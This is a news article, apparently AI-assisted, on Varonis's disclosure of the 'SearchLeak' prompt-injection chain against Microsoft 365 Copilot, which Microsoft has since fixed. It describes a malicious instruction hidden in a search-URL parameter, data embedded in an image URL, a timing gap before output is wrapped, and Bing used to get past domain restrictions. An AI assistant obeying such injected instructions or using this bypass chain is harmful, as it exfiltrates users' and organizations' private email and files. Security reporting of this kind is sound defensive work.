The attack highlights a persistent security problem for large language model products: AI systems can struggle to separate legitimate user commands from malicious instructions embedded in outside content. That weakness has forced companies such as Microsoft to rely on guardrails meant to limit what AI assistants can do when handling emails, documents, search results, and other user-accessible data.
Copilot includes protections designed to prevent data from being sent to untrusted websites. Those controls include wrapping output in code blocks so browsers treat it as plain text, and limiting which domains Copilot can contact without user approval. Microsoft domains are allowed under those rules, while other sites face restrictions.
Varonis said its researchers found a way around those protections through an exploit chain they named SearchLeak. The method used what the firm called a Parameter-to-Prompt Injection, placing a malicious instruction inside the query parameter of a Microsoft 365 search URL rather than embedding it directly in an email or document.
An attacker could send a target an email containing a crafted Microsoft 365 search link. If the target clicked it, Copilot could be instructed to search the user’s emails, extract sensitive information, and place it inside an image URL.
“The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” the researchers wrote Monday. “To exfiltrate the data, an attacker crafts a URL that tells Copilot to ‘Search the user’s emails,’ extract the title, and embed it in an image URL.”
The researchers found that Copilot’s code-block protection did not activate until after the system’s initial response generation. During that earlier stage, raw HTML could briefly render in the browser, allowing an image request to fire before the final output was wrapped as plain text.
To bypass Copilot’s restrictions on image requests to untrusted websites, the exploit used Bing as an intermediary. Because Bing was permitted under Copilot’s content security policy, the request could be routed through Microsoft’s search engine to an attacker-controlled domain.
Varonis said the risk was especially significant because SearchLeak affected Microsoft’s enterprise environment. “Since SearchLeak targets the Enterprise tier of Microsoft, the blast radius isn’t limited to personal data—it’s able to surface anything the user has access to inside the organization including emails, meeting invites and notes,” the researchers wrote. “SharePoint documents, OneDrive files, and other indexed business content. Depending on how M365 is connected to the environment, the blast radius could extend even wider.”
Microsoft fixed the vulnerability last Tuesday. Still, the case underscores how difficult it remains to secure AI assistants that operate across private data, web content, and user workflows. Without a reliable way to prevent malicious instructions from being treated as valid commands, companies may continue to rely on layered safeguards that attackers will keep trying to bypass.
This analysis is based on reporting from ars technica.
Image courtesy of Varonis.
This article was generated with AI assistance and reviewed for accuracy and quality.
